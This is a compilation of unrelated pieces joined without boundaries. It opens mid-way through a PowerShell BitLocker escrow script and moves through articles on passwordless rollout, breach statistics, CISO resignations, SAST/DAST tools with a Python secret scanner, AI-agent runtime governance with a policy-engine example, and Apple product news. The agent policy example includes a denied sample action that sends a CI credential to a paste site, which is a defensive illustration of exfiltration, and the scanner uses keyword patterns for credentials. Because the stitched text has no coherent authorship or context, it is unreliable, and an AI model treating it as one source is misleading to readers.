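    $vol = Get-BitLockerVolume -MountPoint $mp
}
$rp = $vol.KeyProtector | Where-Object KeyProtectorType -eq 'RecoveryPassword' | Select-Object -First 1
BackupToAAD-BitLockerKeyProtector -MountPoint $mp -KeyProtectorId $rp.KeyProtectorId | Out-Null

switch ($vol.VolumeStatus) {
    'FullyDecrypted' {
        # Start encryption bound to the TPM; used-space-only keeps the first pass short.
        Enable-BitLocker -MountPoint $mp -TpmProtector -EncryptionMethod XtsAes256 `
                         -UsedSpaceOnly -SkipHardwareTest | Out-Null
    }
    default {
        # Already encrypted (or in progress) but protection suspended, e.g. after a firmware update.
        if ($vol.ProtectionStatus -eq 'Off') { Resume-BitLocker -MountPoint $mp | Out-Null }
    }
}
$vol = Get-BitLockerVolume -MountPoint $mp
Write-Output "Result: status=$($vol.VolumeStatus) protection=$($vol.ProtectionStatus)"
exit 0
```

Detection runs on the schedule you set in Intune; remediation only runs when detection exits 1, so an already-compliant device is never touched, and the escrow step runs before encryption starts so the recovery key is in Entra ID before there is anything to recover.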
Cloud Kerberos ticket refresh failures occur when devices lose network connectivity. I’ve found that users appreciate understanding that brief network outages might require them to use an alternative authentication method temporarily. Documenting this expectation and providing clear error messages reduces support burden significantly. One organization I worked with created a simple status dashboard showing cloud connectivity health, which dramatically improved user confidence in the system.
The Windows Hello PIN reset flow needs careful planning. Users will forget PINs, not because they’re careless, but because they now have one less password to remember and are redirecting that cognitive effort elsewhere. Implement the Windows Hello for Business PIN reset service (the non-destructive option keeps the user’s enrolled keys), but test it thoroughly in various network conditions. I discovered in one deployment that users couldn’t reset their PIN while offline, which created support tickets even though the feature was technically available online. An offline reset option would have eliminated those tickets, but the design does not allow one: the PIN gates a key held in the TPM, and a reset has to be re-authorized by the identity provider, so the practical fix is to set that expectation in the user guidance and the help desk scripts.
Recovery mechanisms deserve special attention. What happens when a user’s device is stolen? What if the TPM fails? What if they forget their PIN and can’t reach your self-service portal? Document these scenarios and test them with your help desk before full rollout. I’ve found that help desk confidence in recovery procedures directly correlates with user confidence in passwordless authentication.
The endpoint: A genuinely passwordless enterprise
Reaching true passwordless authentication in a hybrid environment means accepting that you’re building a new security model, not just changing how users authenticate. The effort required is substantial, but the security improvement is profound. I’ve watched organizations move from breach-heavy authentication scenarios to Zero Trust architectures where every access request is evaluated in context, and where the compromise of a single device doesn’t cascade into wholesale account takeover.
The passwordless journey isn’t a destination you reach in months — it’s a direction you move in consistently. The organizations that succeed view passwordless migration not as a project with an end date, but as a fundamental shift in how they think about identity and trust. They maintain that momentum by continuously updating policies, expanding coverage to new applications and use cases, and refining their architecture as technology evolves.
The view from the other side is worth the journey. Once you’ve lived in a passwordless environment, going back to password-based authentication feels like removing your seatbelt during a drive. The risk seems obvious in retrospect, and the safety you’ve gained becomes non-negotiable.
This article is published as part of the Foundry Expert Contributor Network.
Identity-based attacks dominate the field, with passwords being involved in 97% of incidents tracked by Eye Security. Abuse of legitimate accounts is a primary cause of cloud security incidents and drives the business of initial access brokers.
However, the study’s results show that attackers’ fundamental methods remain unchanged. “Even in 2026, compromise will still begin with phishing, exploiting misconfigured or vulnerable internet-enabled systems, social engineering, or attacks via the software supply chain,” explains Lodi Hensen, VP of security operations at Eye Security.
BEC attacks are particularly common
Business email compromise (BEC) is the most common form of attack, according to the study: More than 70% of incidents fall into this category. In 40% of these cases, phishing served as the initial point of entry. Analysts say that BEC attacks can remain undetected for weeks without continuous monitoring.
Furthermore, the study highlights that ransomware remains one of the biggest threats. “The proliferation of Ransomware-as-a-Service (RaaS), BuilderLeaks, and access broker marketplaces has lowered the barriers to entry and created a professional ecosystem,” the authors explain.
The report reveals a dangerous trend: the commercialization of insider knowledge. “Groups like ShinyHunters are actively recruiting employees to buy access credentials. This blurs the line between external attacks and insider threats,” the security researchers explain. “For ransomware actors, this purchased access is often faster and more reliable than technical hacking.”
Companies in the industrial, construction, and transport and logistics sectors are particularly affected. Many ransomware attackers exploit everyday vulnerabilities: unprotected applications, insecure remote access, or phishing emails through which employees unknowingly disclose login credentials. The analysis evaluated a total of 630 security incidents in Europe from 2023 to 2025.
In the big picture, CISO roles are hard, and so the majority of CISOs switch jobs every two to three years or less. Lack of support from senior leadership and lack of budget commensurate with the organization’s size and industry are top reasons for this CISO churn, according to The life and times of cybersecurity professionals report from the ISSA.
More specifically, CISOs leave on account of limited board engagement, high accountability with insufficient authority, executive misalignment, and ongoing barriers to implementing risk management and resilience, according to an ISSA spokesperson.
Many of these roadblocks are common across industries, so how does a CISO know when it’s time to move on?
They look for the flags.
Red flag: Paying lip service
A common red flag, and a common reason CISOs leave their jobs, is leadership paying “lip service” to auditors, customers, and competitors, says FinTech CISO Marius Poskus, a popular blogger on security leadership who posted an essay about resigning from “security‑theater roles.”
So, even before signing on to a new job, Poskus suggests looking at the recent events preceding an organization’s decision to hire its first-ever CISO. “I see this often. Usually after an impactful breach, they negotiate fines down by saying they’ll hire their first CISO. In fact, a friend in New Zealand reached out to me today with just such a story,” he tells CSO.
Other indicators that executives are paying lip service to security include constant resource denials, lack of risk ownership, and failure to sign off on identified risks at the top level, leaving the CISO vulnerable. To this end, Poskus shared a security executive charter that outlines senior executives’ accountability for the cybersecurity program.
And, since lack of access to the board is a top-cited reason for leaving, Poskus says to look for problematic reporting lines that block access to executives, such as a boss who refuses to pass issues and requests up to executives.
Red flag: Cognitive disconnect
Lack of access to executives and the board comes up repeatedly in Cybersecurity Ventures reports as a top reason CISOs decide to leave their jobs, according to Steve Morgan, founder of Cybersecurity Ventures. He cites lack of support as another top reason CISOs leave.
Splunk’s 2025 CISO report found that 29% of CISO respondents considered their budget adequate, compared with 41% of board members who felt cybersecurity budgets were adequate.
This cognitive disconnect was clear in Nawab Kabir’s case. He declined a full-time CISO role and became a fractional CISO after a merger left him reporting to an IT director rather than to the CEO, as he previously had. “One of the key red flags for CISOs is if their boss, usually the CIO or CTO, repeatedly blocks attempts to escalate missions to the CEO by downplaying the real risk, asking the CISO to accept that risk, and saying that the CEO simply doesn’t care. So, the risk never gets mentioned in executive leadership meetings,” Kabir says.
After the merger, the initiatives and intervention strategies he developed never got past the director of IT (who came from the merger) to executive leadership. So, Kabir knew it was time to leave. “That’s one of the reasons I became a fractional cybersecurity leader, which I love because now I’m being hired to make a difference at my client companies.”
Red flag: Pushing ethical boundaries
Above all these, the biggest red flag is when leadership pushes against your professional and personal ethics. For example, when a CEO or board wants to conceal compliance gaps, cover up reportable breaches, and refuse to sign off on responsibility for gaps and reporting failures they’ve been made aware of. “This happens more often than we know because most CISOs won’t make public what happened behind the scenes that made them quit, especially when they’re looking for new jobs,” Poskus explains. “Your integrity is your most important asset, so that’s the biggest red flag when we talk about leaving a role rather than staying and fighting.”
In these types of scenarios, the CISO likely lacks critical allies within the organization. Acknowledge this sense of vulnerability, Poskus advises, because it’s a huge red flag. Human resources and legal teams in these situations won’t help because they owe their loyalty to the business, he adds.
Such was the case with former Uber CISO Joe Sullivan, who was thrown under the bus by Uber’s shady leadership after a 2016 breach. In contrast, SolarWinds CISO Tim Brown felt fully supported after a historic supply chain hack in 2020 spread to 18,000 business clients through the update system for its Orion network management product.
“Joe was in such a difficult situation. The company was aggressive towards him, which was so different from my experience at SolarWinds,” says Brown, who had responded to the breach.
Green flag: They have your back
In contrast to Sullivan’s employer, Brown shares that everyone involved in responding to the SolarWinds breach — from IT responders to communications, legal, and executives — felt the same way he did in terms of making things right for clients and regulators. “My situation was difficult, but manageable in many ways because of that support from my team. From day one, we had no question about doing the right thing. We decided on transparency to our customers all the way through the SEC filings,” Brown explains.
Even as a new CEO came onboard under a planned transition shortly after the breach, and as the SEC charged SolarWinds and Brown with fraud for certifying SolarWinds’ security shortly before the sophisticated supply chain hack occurred, Brown has felt ongoing support.
Given his access to the board and CEO, Brown knew well before the breach that the company had his back. He also points to another green flag: The company’s commitment to tabletop exercises of impactful breaches. Throughout the practice scenarios, teams worked together under a customer-centric mandate that advocated transparency and education, the same playbook that they followed in the 2020 breach.
In the end, the SEC dropped its charges against Brown, and in November he attended a virtual toast in his honor to celebrate the SEC dropping the case against him “without prejudice.” More than 200 CISOs of top companies joined, including co-host Joe Sullivan. Ultimately, as Brown had hoped, the entire experience provided teachable moments to help push the CISO role up the maturity curve.
Changing internal mindsets
As CISOs burn out or leave under stressful circumstances, many turn to fractional work as Kabir has. And, in his case, working with new clients gives him plenty of opportunities to turn red flags into green flags.
For example, he points to lack of board access and resources. In many cases he steps into, the former cybersecurity leaders didn’t understand the business and talked technically over their executives’ heads. As a result, he’s had to convert fatigued, resistant executive teams that don’t want to repeat those experiences with a new cybersecurity leader.
For these clients, he likes to call an “all hands” meeting and conduct what he calls interactive “business continuity stress tests”: tabletop scenarios that impact a revenue-generating activity. “Take manufacturing, if this machine is down for six to eight hours what would be our revenue costs associated with this downtime? That gets attention,” Kabir says. “Then finance starts talking within their teams and it goes beyond that to the CEO because now it’s seen as a business issue.”
CISOs, then, can change culture to turn a red flag into a green flag. But knowing when and how to do so depends on the indicators mentioned. Even in a fractional role, CISOs should still expect some of their clients to try to compromise their ethics, for example by covering up findings. Fortunately, that red flag usually reveals itself early in the audit, when executives and business units appear afraid to answer questions, as if trying to hide something.
“A lot of red flags have to do with lack of security culture or mismatch in understanding the risk tolerance of the company and what the actual risks are. This red flag goes beyond: If they don’t want to be questioned about what they’ve done so far, that is a huge red flag that they’re covering something up,” Kabir explains.
To be safe, he carries indemnity insurance and retains his own legal counsel — as should all CISOs with large enough salaries who report to the board and C-suite. Because, as in the case of Joe Sullivan and many other examples that go unreported, CISOs can’t count on their organizations to have their backs legally or professionally should the big one hit — especially if those executives, by virtue of their unresponsiveness and lack of support, are the cause of it.
The software supply chain, or rather its vulnerabilities, has caused a lot of turmoil in recent years. A particularly headline-grabbing example is the attack on IT service provider SolarWinds, which affected more than 18,000 customer companies. Although the attack was by no means the only one on software supply chains, it did lead to a reassessment of the question of who is responsible for them.
One reaction to the SolarWinds attack, for example, was former US President Biden’s “Executive Order on Improving the Nation’s Cybersecurity”. The order not only emphasized how important securing supply chains is, but also explicitly highlighted developers’ responsibility when it comes to delivering secure software. Although the order applies only to US government agencies and their business partners, it stands for the principle that all organizations involved must vet their software vendors in order to provide secure code, regardless of whether a company develops programs and applications only for itself or is part of a third party’s software supply chain.
The biggest problem: for many years, software developers were judged almost exclusively on how fast they could code. Security was either an afterthought or someone else’s responsibility. Although many developers are now upskilling in cybersecurity, they need help to ensure that their code is free of vulnerabilities. Tools for Dynamic Application Security Testing (DAST) and Static Application Security Testing (SAST) can make a valuable contribution here.
DAST & SAST tools: what are they?
It is not surprising that both SAST and DAST tools are regaining importance in connection with securing software supply chains. After all, they give developers the means to deliver secure code, either as part of a formal DevSecOps program or to move responsibility for security closer to where applications are developed. Both SAST and DAST tools aim to make code more secure, ideally long before an application reaches a production environment and becomes part of the software supply chain. The tools pursue the same goal but approach the problem from different angles:
SAST tools analyze the source code of programs and applications that are still under development. They can be integrated into a CI/CD pipeline or configured to run automatically when a developer opens a pull request. This lets Static Application Security Testing tools ensure that new changes to an application do not inadvertently add vulnerabilities or introduce other errors. Some SAST tools can also become part of integrated development environments (IDEs). In that case the platform warns developers about errors as they write code, much like a modern word processor with spell-checking.
DAST tools, by contrast, are used after an application has been compiled. A Dynamic Application Security Testing tool is less intended to uncover vulnerabilities in the code (which a SAST tool has ideally already eliminated) and instead acts as an external tester that attempts to break into a program, for example via exposed HTTP or HTML interfaces. Some DAST tools can also be configured to look for weaknesses to attacks common in particular industries, such as finance or retail.
Because of these differences, SAST tools must support the programming language you have chosen. Most DAST tools do not require this, although they may also be able to work with source code to locate problems. While some companies use either only a DAST or only a SAST tool, it is advisable to use a combination of the two or to work with a tool that contains both components. Companies that do so are better able to protect their applications, which benefits the security of the software supply chain as a whole.
Dynamic Application Security Testing tools: top 4
Below are some of the most important DAST and SAST tools in use today.
1. Acunetix DAST
The Acunetix DAST platform uses DAST and IAST (Interactive Application Security Testing) to look for more than 7,000 vulnerabilities in finished code, website designs, or applications. With IAST, the scanning and testing code is embedded in a compiled program, similar to debug symbols. This lets Acunetix start its scans while a program is actively running, which potentially uncovers more vulnerabilities than examining an application at rest. IAST should also reduce the number of false positives compared to SAST.
The platform’s code is written in C++ for speed. The platform exports up to 90 percent of its results before the scan is even half complete. Users can configure the Acunetix platform to run once or set up schedules for repeated tests over time. And because the platform is so lightweight, it can even scan multiple environments simultaneously without losing speed.
2. OpenText Fortify WebInspect
The former Fortify WebInspect platform from Micro Focus now operates under the name Fortify WebInspect following the company’s acquisition by OpenText. It is available as an on-premises installation, as a service, or as a combination of both within a hybrid environment. Although it works as a standalone DAST tool, it can be integrated into CI/CD pipelines and can also be used by developers who normally use only SAST tools.
The tool can also search only for particularly critical vulnerabilities, warning developers about serious flaws so that they are fixed long before deployment. In addition, this DAST tool is able to check whether the code complies with government regulations and industry standards (NIST 800-53, PCI DSS, OWASP, HIPAA, etc.). When a vulnerability is discovered, the platform visualizes the problem in a graphical interface and proposes iterative fixes.
3. Black Duck (formerly Synopsys)
Black Duck’s DAST platform is also available as a managed service. This not only eliminates internal maintenance and management; the company also provides advice and assistance when needed, for example when a scan raises an issue the development team cannot handle on its own.
The tool not only uncovers all the common vulnerabilities that plague many programs (such as SQL injection or cross-site scripting), but also has a manual scan mode that lets you track down more complex problems in a targeted way. It also finds security flaws related to authentication, access control, and session management errors that do not show up in conventional scans.
4. Tenable.io Web App Scanning
Tenable is something of a veteran among security vendors and is primarily known for its robust, cloud-based vulnerability management platform. Web App Scanning is part of that platform and serves as a powerful DAST tool.
The Tenable app works only with web applications but performs a deep scan that covers HTML5 as well as standard HTML and AJAX. The app has a simple user interface that is accessible even to teams that have to get by without application security specialists. Automations are easy to set up, and users can configure exactly which sections of the program code should be scanned. Beyond that, Web App Scanning can be used as a standalone solution or integrated into another Tenable cybersecurity solution.
Static Application Security Testing tools: top 5
1. Checkmarx SAST
Checkmarx’s SAST program combines advanced features with one of the best web-based user interfaces among SAST tools. The interface allows even those unversed in security to find their way around. Checkmarx not only identifies vulnerabilities but also explains why a discovered vulnerability is particularly risky. Developers also receive tips on how to eliminate the problems found as easily and effectively as possible.
By default, the Checkmarx tool supports more than 25 programming languages. The application can also be configured to run automatically as part of a CI/CD pipeline. Of course, you can also set up custom queries and run them as needed, and integrate the tool into all common IDE or source code management platforms.
2. OpenText Fortify Static Code Analyzer
Fortify Static Code Analyzer from OpenText combines both SAST and DAST elements. As a SAST platform, the solution uses a clear, visual interface to show developers the specific vulnerabilities in the code (and statistics about the kinds of vulnerabilities regularly uncovered), which are divided into 810 different vulnerability categories. Developers are then directed to a training interface that, according to the vendor, offers interesting and entertaining lessons on security and secure code.
The platform supports 27 programming languages and frameworks and can be deployed on-premises or as a service. It also integrates with most common IDEs, such as Eclipse and Visual Studio.
3. Perforce Klocwork SAST
The Klocwork SAST tool focuses on speed, even in the largest environments. It works with applications coded in C, C++, Java, JavaScript, and Python, even inside Docker containers, and can be integrated into any major IDE such as Visual Studio Code, IntelliJ, and many others. According to the vendor, Klocwork was developed to provide a SAST tool for complex environments.
With Klocwork, users can scan huge code bases containing millions of lines. To shorten scan times, for example, only the changed areas of code are scanned rather than the entire program every time. The SAST tool also helps train developers in security: it is fully integrated with the Secure Code Warrior training platform, which focuses on security and awareness training.
4. Spectral SpectralOps platform
Check Point recently acquired Spectral, but the new company continues to actively support the SpectralOps platform, probably in part because of its unique SAST capabilities. SpectralOps finds sensitive information such as API keys, credentials, and tokens that developers often hard-code while building programs. The idea behind it: uncover misconfigurations that could allow access to secret information while a program is still in development.
SpectralOps continuously scans every step of the software development lifecycle and uses artificial intelligence to keep track of more than 2,000 detection engines. To keep false positives in check, downstream tests are also performed. Afterwards, the tool can report its findings to Slack, open a Jira ticket, or alert developers via almost any communication platform.
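The kind of pre-merge check described in the SAST overview above and in the SpectralOps passage, as an added example written for this page rather than code from Spectral, Checkmarx or any other vendor listed here: a pattern match for credential-like assignments, followed by a Shannon-entropy filter and a placeholder list to suppress false positives, run over a constructed source snippet. The regex SECRET_NAME, the functions scan_source and ci_gate, the placeholder list and the thresholds are assumptions; the sample credential is made up.

```python
"""Minimal SAST-style hardcoded-secret check (added illustration, not vendor code)."""
from __future__ import annotations

import math
import re
from dataclasses import dataclass

# Assignment whose left-hand name looks credential-bearing and whose value is a quoted literal.
# The keyword list is an illustrative assumption, not a vendor's rule set.
SECRET_NAME = re.compile(
    r"""(?P<name>[A-Za-z_]*(?:api[_-]?key|secret|token|password|passwd)[A-Za-z_]*)\s*[=:]\s*['"](?P<value>[^'"]+)['"]""",
    re.IGNORECASE,
)
# Values that are clearly placeholders rather than live secrets (assumed list).
PLACEHOLDERS = {"changeme", "example", "placeholder", "xxx", "todo", "dummy", "test"}


@dataclass
class Finding:
    line: int
    name: str
    entropy: float
    preview: str  # redacted view, so the report itself does not leak the value


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking keys score high, ordinary words score low."""
    if not s:
        return 0.0
    counts: dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_placeholder(value: str) -> bool:
    """Template references (${VAR}, <VAR>) and well-known dummy words are not findings."""
    low = value.lower()
    return any(p in low for p in PLACEHOLDERS) or value.startswith("${") or value.startswith("<")


def scan_source(text: str, min_entropy: float = 3.0, min_len: int = 8) -> list[Finding]:
    """Return one Finding per line that carries a likely hardcoded credential."""
    findings: list[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in SECRET_NAME.finditer(line):
            value = m.group("value")
            if len(value) < min_len or is_placeholder(value):
                continue  # too short or obviously fake: not a secret
            ent = shannon_entropy(value)
            if ent < min_entropy:
                continue  # low entropy: a word or repeated pattern, not a key
            preview = value[:4] + "…" + value[-2:]
            findings.append(Finding(lineno, m.group("name"), round(ent, 2), preview))
    return findings


def ci_gate(text: str) -> int:
    """Exit-code style result for a pipeline step: 0 = clean, 1 = findings present."""
    return 1 if scan_source(text) else 0


# Constructed sample source; the key-like string is random filler, not a real credential.
SAMPLE = '''\
import os
DB_PASSWORD = os.environ["DB_PASSWORD"]
api_key = "9f8Ab3zQ7wLkP2xR5tY0vN4mC1eH6jD"
password = "changeme"
aws_secret: "${AWS_SECRET_ACCESS_KEY}"
token = "aaaabbbbaaaa"
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE):
        print(f"line {f.line}: {f.name} looks hardcoded (entropy {f.entropy}, {f.preview})")
    raise SystemExit(ci_gate(SAMPLE))
```

Only line 3 of the sample is reported: the environment lookup on line 2 has no literal value, the placeholder on line 4 and the template reference on line 5 are filtered by name, and the low-entropy literal on line 6 is filtered by the entropy threshold. Wired into a pull-request pipeline, the non-zero exit status from ci_gate is what blocks the merge.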
5. Veracode Static Analysis SAST
Veracode’s SAST platform is a cloud service, which eliminates the complex maintenance of a SAST application in your own environment. Security vendor Veracode works on the principle of just-in-time learning. That means vulnerable code can be detected while it is being written. Once the code is corrected, the Veracode platform generates a report so that companies can promote and encourage security-conscious developers.
Besides IDE integration, Veracode’s focus is on speed: every build of a program or application can be scanned automatically, with an average scan time of just 90 seconds. Every action is logged throughout, which in turn makes audits easier.
The Unattended Laptop Problem
No developer would leave their laptop unattended and unlocked. The risk is obvious. A developer laptop has root-level access to production systems, repositories, databases, credentials, and APIs. If someone sat down and started using it, they could review pull requests, modify files, commit code, and access anything the developer can access.
Yet this is how many teams are deploying agents today. Autonomous systems are given credentials, tools, and live access to sensitive environments with minimal structure. Work executes in parallel and continuously, at a pace no human could follow. Code is generated faster than developers can realistically review, and they cannot monitor everything operating on their behalf.
Once execution is parallel and continuous, the potential for mistakes or cascading failures scales quickly. Teams will continue to adopt agents because the gains are real. What remains unresolved is how to make this model safe enough to operate without requiring manual approval for every action. Manual approval slows execution back down to human speed and eliminates the value of agents entirely. And consent fatigue is real.
Why AI Agents Break Existing Governance
Traditional security controls were designed around a human operator. A person sits at the keyboard, initiates actions deliberately, and operates within organizational and social constraints. Reviews worked because there was time between intent and execution. Perimeter security protected the network boundary, while automated systems operated within narrow execution limits.
But traditional security assumes something deeper: that a human is operating the machine. Firewalls trust the laptop because an employee is using it. VPNs trust the connection because an engineer authenticated. Secrets managers grant access because a person requested it. The model depends on someone who can be held accountable and who operates at human speed.
Agents break this assumption. They act directly, reading repositories, calling APIs, modifying files, using credentials. They have root-level privileges and execute actions at machine speed.
Legacy controls were never intended for this. The default response has been more visibility and approvals, adding alerts, prompts, and confirmations for every action. This does not scale and generates “consent fatigue”, annoying developers and undermining the very security it seeks to enforce. When agents execute hundreds of actions in parallel, humans cannot review them meaningfully. Warnings become noise.
AI Governance and the Execution Layer: The Three Cs Framework
Each major shift in computing has moved security closer to execution. Agents follow the same trajectory. If agents execute, security must operate at the agentic execution layer.
That shift maps governance to three structural requirements: the 3Cs.
Contain: Bound the Blast Radius
Every execution model relies on isolation. Processes required memory protection. Virtual machines required hypervisors. Containers required namespaces. Agents require an equivalent boundary. Containment limits failure so mistakes made by an agent don’t have permanent consequences for your data, workflows, and business. Unlocking full agent autonomy requires the confidence that experimentation won’t be reckless. Without it, autonomous execution fails.
Curate: Define the Agent’s Environment
What an agent can do is determined by what exists in its environment. The tools it can invoke, the code it can see, the credentials it can use, the context it operates within. All of this shapes execution before the agent acts.
Curation isn’t approval. It is construction. You are not reviewing what the agent wants to do. You are defining the world it operates in. Agents do not reason about your entire system. They act within the environment they are given. If that environment is deliberate, execution becomes predictable. If it is not, you have autonomy without structure, which is just risk.
Control: Enforce Boundaries in Real Time
Governance that exists only on paper has no effect on autonomous systems. Rules must apply as actions occur. File access, network calls, tool invocation, and credential use require runtime enforcement. This is where alert-based security breaks down. Logging and warnings explain what happened or ask permission after execution is already underway.
Control determines what can happen, when, where, and who has the privilege to make it happen. Properly executed control does not remove autonomy. It defines its limits and removes the need for humans to approve every action under pressure. If this sounds like a policy engine, you aren’t wrong. But this must be dynamic and adaptable, able to keep pace with an agentic workforce.
Putting the 3Cs Into Practice
The three Cs reinforce one another. Containment limits the cost of failure. Curation narrows what agents can attempt and makes them more useful to developers by applying semantic knowledge to craft tools and context to suit the specific environment and task. Control at the runtime layer replaces reactive approval with structural enforcement.
In practice, this work falls to platform teams. It means standardized execution environments with isolation by default, curated tool and credential surfaces aligned to specific use cases, and policy enforcement that operates before actions complete rather than notifying humans afterward. Teams that build with these principles can use agents effectively without burning out developers or drowning them in alerts. Teams that do not will discover that human attention is not a scalable control plane.
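One way the three Cs map onto code, as an added example that is not part of the original article and not a product: a curated Environment (sandbox root, tool set, credential-to-host bindings, egress allowlist) and an evaluate function that decides each proposed agent action before it runs, so enforcement happens at the execution layer rather than as an alert afterwards. The Environment, Action and Decision types, the tool names, the hosts and the constructed plan are all assumptions for illustration.

```python
"""Runtime policy for agent tool calls along the three Cs (added illustration).

Contain: a sandbox root that the agent's file actions cannot escape.
Curate:  an explicit tool set and credential-to-host bindings built for the task.
Control: every action is evaluated before it executes, not logged afterwards.
All type names, tool names, hosts and the sample plan are assumptions, not the article's.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from pathlib import PurePosixPath
from urllib.parse import urlparse


@dataclass(frozen=True)
class Environment:
    sandbox_root: str          # Contain: filesystem boundary
    tools: frozenset           # Curate: tools the agent may invoke
    credentials: dict          # Curate: credential name -> hosts it may be presented to
    allowed_hosts: frozenset   # Control: network egress allowlist
    read_only: bool = False


@dataclass(frozen=True)
class Action:
    tool: str
    args: dict = field(default_factory=dict)


@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str


def inside_sandbox(root: str, path: str) -> bool:
    """Lexically resolve '.' and '..' and require the result to stay under root."""
    parts: list[str] = []
    for seg in PurePosixPath(root, path).parts:
        if seg == "..":
            if parts:
                parts.pop()
        elif seg not in (".", ""):
            parts.append(seg)
    resolved = PurePosixPath(*parts)
    rootp = PurePosixPath(root)
    return resolved == rootp or rootp in resolved.parents


def evaluate(env: Environment, action: Action) -> Decision:
    """Control: decide before the action runs; the first violated boundary wins."""
    if action.tool not in env.tools:
        return Decision(False, f"tool '{action.tool}' is not in the curated tool set")
    if action.tool in ("read_file", "write_file"):
        path = action.args.get("path", "")
        if not inside_sandbox(env.sandbox_root, path):
            return Decision(False, f"path '{path}' escapes sandbox {env.sandbox_root}")
        if action.tool == "write_file" and env.read_only:
            return Decision(False, "environment is read-only")
    if action.tool == "http_request":
        host = urlparse(action.args.get("url", "")).hostname or ""
        if host not in env.allowed_hosts:
            return Decision(False, f"host '{host}' is not on the egress allowlist")
        cred = action.args.get("credential")
        if cred is not None:
            if cred not in env.credentials:
                return Decision(False, f"credential '{cred}' is not provisioned for this task")
            if host not in env.credentials[cred]:
                return Decision(False, f"credential '{cred}' may not be sent to '{host}'")
    return Decision(True, "within policy")


def run_plan(env: Environment, plan: list[Action]) -> list[Decision]:
    """Evaluate a batch of proposed actions; only allowed ones would be executed."""
    return [evaluate(env, a) for a in plan]


# Constructed environment and plan for a "fix the failing tests" task; hosts are not real.
EXAMPLE_ENV = Environment(
    sandbox_root="/work/repo",
    tools=frozenset({"read_file", "write_file", "run_tests", "http_request"}),
    credentials={"ci_token": frozenset({"ci.example.internal"})},
    allowed_hosts=frozenset({"ci.example.internal", "docs.example.internal"}),
)
EXAMPLE_PLAN = [
    Action("read_file", {"path": "src/main.py"}),                         # allowed
    Action("write_file", {"path": "../../etc/hosts", "data": "x"}),      # contain: denied
    Action("run_tests"),                                                  # allowed
    Action("deploy", {"target": "prod"}),                                 # curate: denied
    Action("http_request", {"url": "https://ci.example.internal/status",
                            "credential": "ci_token"}),                   # allowed
    Action("http_request", {"url": "https://paste.example.com/upload",
                            "credential": "ci_token"}),                   # control: denied
]

if __name__ == "__main__":
    for action, decision in zip(EXAMPLE_PLAN, run_plan(EXAMPLE_ENV, EXAMPLE_PLAN)):
        print(f"{'ALLOW' if decision.allowed else 'DENY '} {action.tool:13} {decision.reason}")
```

The three denials in the sample plan come from three different layers: the path traversal is stopped by the sandbox boundary, the uncurated tool never exists for the agent to call, and the credential is refused at the egress check even though the agent legitimately holds it. None of these need a human to read an alert; the decision is made before anything executes.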
The third-party Apple retailer said that MacBook Pro stock is very low currently because there is an imminent new product introduction. Apple typically coordinates supply with retail stores ahead of a new model launch to avoid leaving resellers with too many outdated machines.
Over the weekend, Bloomberg said that the new MacBook Pros are going to launch alongside macOS Tahoe 26.3 during the February/March timeframe, and we are getting closer to the software's release date. Today's Xcode 26.3 release candidate launch also suggests that a debut isn't far off.
It's atypical for Apple to introduce an Xcode release candidate without also providing iOS and macOS release candidates, and we haven't seen the iOS 26.3 or macOS 26.3 RCs yet. Holding back a macOS release candidate is sometimes an indication that the RC contains information that Apple doesn't want to leak. If the M5 Pro and M5 Max MacBook Pro models are going to come out alongside macOS Tahoe 26.3, it's possible that the macOS Tahoe 26.3 RC includes new model identifiers that would give away the upcoming launch.
Apple has most commonly held macOS release candidates for a few days to a week. Prior to when new M3 Macs came out in October 2023, for example, Apple provided the iOS 17.1 and accompanying Xcode release candidate on October 17, but held the macOS 14.1 release candidate. New Macs were introduced on October 23, and then the macOS 14.1 RC came out on October 24. Apple followed the same pattern ahead of the first M1 Macs in November 2020, and the M2 Mac mini in October 2022. In each case, Apple held the macOS RC while launching the iOS and Xcode RCs.
What's different in this situation is that we haven't seen the iOS 26.3 RC either, so the hold time is less clear. Apple could debut new MacBook Pro models as soon as tomorrow, then release both RCs. There's also a possibility we have to wait a week or two before new MacBook Pro models come out, especially if the RCs aren't quite ready to go and another beta update is planned.
It's not entirely clear why Apple released the Xcode 26.3 RC now instead of holding it, but it does include agentic coding tools that Apple worked with Anthropic and OpenAI to implement, so Apple may have committed to a specific schedule for the functionality.
All signs suggest that we're going to get the M5 Pro and M5 Max MacBook Pro models soon. Apple already released the standard 14-inch M5 MacBook Pro, but higher-end 14-inch and 16-inch models have yet to be refreshed.
The reseller that spoke to MacRumors also said that HomePod mini supplies are drying up with many models sold out, but there is no official word on whether that's because of supply chain issues or because of an imminent update. HomePod mini stock has been dwindling since October 2025, so stock continuing to be low doesn't give us new information on the HomePod mini 2, unfortunately.
This article, "M5 Pro and M5 Max MacBook Pro Launch Imminent as Reseller Stock Dwindles" first appeared on MacRumors.com
In addition to answering questions about Apple devices and services and providing device-specific help, Apple says the Support Assistant is able to help run diagnostics to show details about a device's health and performance.
The Apple Support app now has a more informative interface for the Support Assistant, and the tab for accessing the feature has an updated "Ask" label with a new icon instead of a "Chat" label. Apple is no longer calling the Support Assistant an "Early Preview," suggesting it is now available in a more official capacity.
Despite the update, the Support Assistant remains limited, and it is not yet available to all users. It's possible that Apple has expanded the feature to a larger number of testers, but not everyone will see it yet.
Apple began testing the Support Assistant last August. The tool uses AI to answer questions related to Apple support, and it is able to walk users through step-by-step solutions for common problems.
If the Support Assistant is unable to solve a problem, users are able to escalate a request to Apple's support staff for further help.
This article, "Apple Continues Improving Apple Support App's AI Assistant" first appeared on MacRumors.com
Agentic coding will allow Xcode to complete more complex app development tasks autonomously. Claude, ChatGPT, and other AI models have been available for use in Xcode since Apple added intelligence features in Xcode 26, but until now, AI was limited and was not able to take action on its own. That will change with the option to use an AI coding assistant.
AI models can access more of Xcode's features to work toward a project goal, and Apple worked directly with Anthropic and OpenAI to configure their agents for use in Xcode. Agents can create new files, examine the structure of a project in Xcode, build a project directly and run tests, take image snapshots to double-check work, and access full Apple developer documentation that has been designed for AI agents.
Adding an agent to Xcode can be done with a single click in the Xcode settings, with agents able to be updated automatically as AI companies release updates. Developers will need to set up an Anthropic or OpenAI account to use those coding tools in Xcode, paying fees based on API usage.
